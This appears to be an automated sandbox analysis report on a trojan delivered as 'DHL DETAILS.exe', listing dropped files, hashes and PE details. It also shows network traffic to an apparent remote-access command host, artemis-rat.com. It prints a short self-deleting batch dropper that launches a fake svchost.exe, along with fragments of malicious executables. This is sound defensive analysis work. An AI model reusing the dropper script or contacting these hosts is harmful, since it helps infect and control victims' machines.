SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n2icyzxy.q3j.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qs3mamvb.ys4.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_urtq0zpd.akn.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\tmp5A0E.tmp.bat

Download File

Process:	C:\Users\user\Desktop\DHL DETAILS.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	153
Entropy (8bit):	5.028023400894919
Encrypted:	false
SSDEEP:	3:mKDDCMNqTtvL5oUkh4EaKC5ZACSmqRDUkh4E2J5xAInTRI68VZPy:hWKqTtT69aZ5Omq1923fTb8Vk
MD5:	7B575CF10B0C8B1360CC9855F41F4A84
SHA1:	F293BC3A7A71C0CB6B7274C8B391811FF24805B3
SHA-256:	4BB791EDCB90D2F8D47793F1E9F4E33BA9A132ED322970F3FEC03FE42879065A
SHA-512:	6005CC75385BAC5DE4A7B1B97A5B78CC05B680FFF2BA9F024437065F42564FFA971E84DCBBEF429E0BDDFBD5A5645B6E0816A9DA8EEBFBF8029DBA0E833A43D2
Malicious:	false
Preview:	@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\svchost.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmp5A0E.tmp.bat" /f /q..

C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	108664
Entropy (8bit):	5.8959760602012965
Encrypted:	false
SSDEEP:	1536:QSF7vA1hRqHNxxMjlI3ZC+0CtOss6mdcQ6A4vhZ91RKGpQJN:nA1hYPMUs6mdclA4vhNRKG4N
MD5:	914F728C04D3EDDD5FBA59420E74E56B
SHA1:	8C68CA3F013C490161C0156EF359AF03594AE5E2
SHA-256:	7D3BDB5B7EE9685C7C18C0C3272DA2A593F6C5C326F1EA67F22AAE27C57BA1E6
SHA-512:	D7E49B361544BA22A0C66CF097E9D84DB4F3759FBCC20386251CAAC6DA80C591861C1468CB7A102EEE1A1F86C974086EBC61DE4027F9CD22AD06D63550400D6D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0% Antivirus: Virustotal, Detection: 0%, Browse
Joe Sandbox View:	Filename: payment.exe, Detection: malicious, Browse Filename: New Order 7003153933.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.TrojanX-gen.10939.30166.exe, Detection: malicious, Browse Filename: Purchase Order.exe, Detection: malicious, Browse Filename: CHEMICAL SPECIFICATION.exe, Detection: malicious, Browse Filename: Quotation.pdf.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: QUOTATION#00913-1HNMR FORMONONETIN LIST.exe, Detection: malicious, Browse Filename: FAC- IST9G4VW.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....<.]..............0..X...........v... ........@.. ..............................O.....`.................................\v..O.......$............f..xB..........$u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B.................v......H.......(...................xE..$t......................................2~P....o.....r...p(....VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F

C:\Users\user\AppData\Roaming\svchost.exe

Download File

Process:	C:\Users\user\Desktop\DHL DETAILS.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	6.296472132107685
Encrypted:	false
SSDEEP:	768:ORSWgr22fLIXyiTUL7n15OaZdMUUMGq5NgvzRxoIdZH:ORD52fEXyAULxVZdMU1loLHoAF
MD5:	0603858E620614E6BADC889156F4F868
SHA1:	9E3A8D66B1A788B262F047FC0E13830292911D5B
SHA-256:	922D60E40972C644FF506CE7475A18636AFA17ABDAD800CFAF9FBC413A742E76
SHA-512:	7C8C09D43E7798B37F9A678DFC0615D2716293B4B35E3049964CED86B065A0537595A12186E2B1156D418DA6AE4407A9C88FAC1879C34BC8AA11CFE7D485506F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 53% Antivirus: Virustotal, Detection: 35%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....X............"...0.................. ....@...... ....................................`............................................................................................8............................................................ ..H............text........ ...................... ..`.rsrc...............................@..@........................................H........@...u......Y...................................................H......./a..I...VeM.T#B..\/E.D.aW..8+..>F~.....o....o....F~.....o....o....Vs$........s$..........,...{.....`}......{.....f_}....j.{....-..s'...}.....{......{......{....:..}.....o,.....{.....3..{.....(.....{....o-...o......{.......}.....{.....{....(3...,...{....}.......{....((...($.....{.......}.....{.....{....(3...,...}.......{....((...($.....(4..."..(5..."..(6..."..(7...b.{....,..{.....j.....

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\VHFSQv\VHFSQv.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	298
Entropy (8bit):	4.924206445966445
Encrypted:	false
SSDEEP:	6:zx3M1tFAbQtASR30qyMstwYVoRRZBXVN+J0fFdCsq2UTiMdH8stCal+n:zK13P30ZMt9BFN+QdCT2UftCM+
MD5:	932782CF70ED00D22C0B08B5027B4E31
SHA1:	78F460A2155D9E819B8452C281285D7E0A7AC14F
SHA-256:	F2C2477FB3FD0A30F3D3D8637EF9C774B43E940043635DF90CDD804799A2ECE7
SHA-512:	C83E72797C03CABCAB066B95BAEEBB13944143846794061CF9482EA3B283979E470930047FDAE72A6F06F51F3127FF39DAAEFAAD7557E3AD49F590B9E7B78D24
Malicious:	false
Preview:	Microsoft (R) Build Engine version 4.8.4084.0..[Microsoft .NET Framework, version 4.0.30319.42000]..Copyright (C) Microsoft Corporation. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...

\Device\Null

Download File

Process:	C:\Windows\System32\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.41440934524794
Encrypted:	false
SSDEEP:	3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5:	3DD7DD37C304E70A7316FE43B69F421F
SHA1:	A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256:	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512:	713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious:	false
Preview:	..Waiting for 3 seconds, press a key to continue ....2.1.0..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.296472132107685
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	DHL DETAILS.exe
File size:	40'960 bytes
MD5:	0603858e620614e6badc889156f4f868
SHA1:	9e3a8d66b1a788b262f047fc0e13830292911d5b
SHA256:	922d60e40972c644ff506ce7475a18636afa17abdad800cfaf9fbc413a742e76
SHA512:	7c8c09d43e7798b37f9a678dfc0615d2716293b4b35e3049964ced86b065a0537595a12186e2b1156d418da6ae4407a9c88fac1879c34bc8aa11cfe7d485506f
SSDEEP:	768:ORSWgr22fLIXyiTUL7n15OaZdMUUMGq5NgvzRxoIdZH:ORD52fEXyAULxVZdMU1loLHoAF
TLSH:	56036C22AA4C1237C9BF42F94C5140C03775E30377D6EBBA9CD651925A837C27AB0E9E
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....X............"...0.................. ....@...... ....................................`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xC398581B [Tue Dec 26 19:12:27 2073 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x5d6	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb6c4	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9784	0x9800	096fdac7260fee49186bbcc26cff2aab	False	0.5958059210526315	data	6.3660577496040185	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x5d6	0x600	f1ee9f02a5cb6e37adf0d993ee3f387b	False	0.4186197916666667	data	4.124252649326652	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xc0a0	0x34c	data			0.4099526066350711
RT_MANIFEST	0xc3ec	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Network Behavior

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 9, 2024 13:14:09.451955080 CET	192.168.2.5	1.1.1.1	0x645f	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:13.728269100 CET	192.168.2.5	1.1.1.1	0x68f	Standard query (0)	artemis-rat.com	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:15.568917990 CET	192.168.2.5	1.1.1.1	0x71a5	Standard query (0)	check.unblock-us.com	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:16.403837919 CET	192.168.2.5	1.1.1.1	0xcd9c	Standard query (0)	ktxcomay.com.vn	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:17.024239063 CET	192.168.2.5	1.1.1.1	0x3a97	Standard query (0)	repository.gij.edu.gh	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:35.197061062 CET	192.168.2.5	1.1.1.1	0x6889	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:46.270912886 CET	192.168.2.5	1.1.1.1	0x985	Standard query (0)	terminal7.veeblehosting.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 9, 2024 13:14:09.607131004 CET	1.1.1.1	192.168.2.5	0x645f	No error (0)	github.com		140.82.114.3	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:13.901326895 CET	1.1.1.1	192.168.2.5	0x68f	No error (0)	artemis-rat.com		172.67.140.87	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:13.901326895 CET	1.1.1.1	192.168.2.5	0x68f	No error (0)	artemis-rat.com		104.21.54.158	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:15.775017977 CET	1.1.1.1	192.168.2.5	0x71a5	No error (0)	check.unblock-us.com	x.checkx.unblock-us.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 9, 2024 13:14:15.775017977 CET	1.1.1.1	192.168.2.5	0x71a5	No error (0)	x.checkx.unblock-us.com	uu-wrong-check-537652193.us-east-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 9, 2024 13:14:15.775017977 CET	1.1.1.1	192.168.2.5	0x71a5	No error (0)	uu-wrong-check-537652193.us-east-1.elb.amazonaws.com		52.54.249.241	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:15.775017977 CET	1.1.1.1	192.168.2.5	0x71a5	No error (0)	uu-wrong-check-537652193.us-east-1.elb.amazonaws.com		54.156.164.130	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:17.407808065 CET	1.1.1.1	192.168.2.5	0xcd9c	No error (0)	ktxcomay.com.vn		222.255.238.159	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:17.526078939 CET	1.1.1.1	192.168.2.5	0x3a97	No error (0)	repository.gij.edu.gh		102.223.20.217	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:28.451307058 CET	1.1.1.1	192.168.2.5	0x70a	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 9, 2024 13:14:28.451307058 CET	1.1.1.1	192.168.2.5	0x70a	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:35.351950884 CET	1.1.1.1	192.168.2.5	0x6889	No error (0)	github.com		140.82.113.3	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:14:46.453988075 CET	1.1.1.1	192.168.2.5	0x985	No error (0)	terminal7.veeblehosting.com		185.56.136.50	A (IP address)	IN (0x0001)	false
Mar 9, 2024 13:16:50.163995981 CET	1.1.1.1	192.168.2.5	0xf1a1	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 9, 2024 13:16:50.163995981 CET	1.1.1.1	192.168.2.5	0xf1a1	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49741	104.16.104.12	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.828583002 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:11.983196020 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:11 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49746	104.25.167.88	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.836667061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:11.990716934 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:11 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49735	94.131.63.120	58378	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.884046078 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49758	162.214.170.144	37592	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.886903048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.348684072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49770	172.67.181.20	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.894922018 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.049248934 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:11 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49775	185.162.228.154	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.902190924 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.056824923 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:11 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49782	104.25.64.27	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.919519901 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.074014902 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:11 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49766	107.180.88.173	35774	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:11.930804014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:12.442439079 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.067500114 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
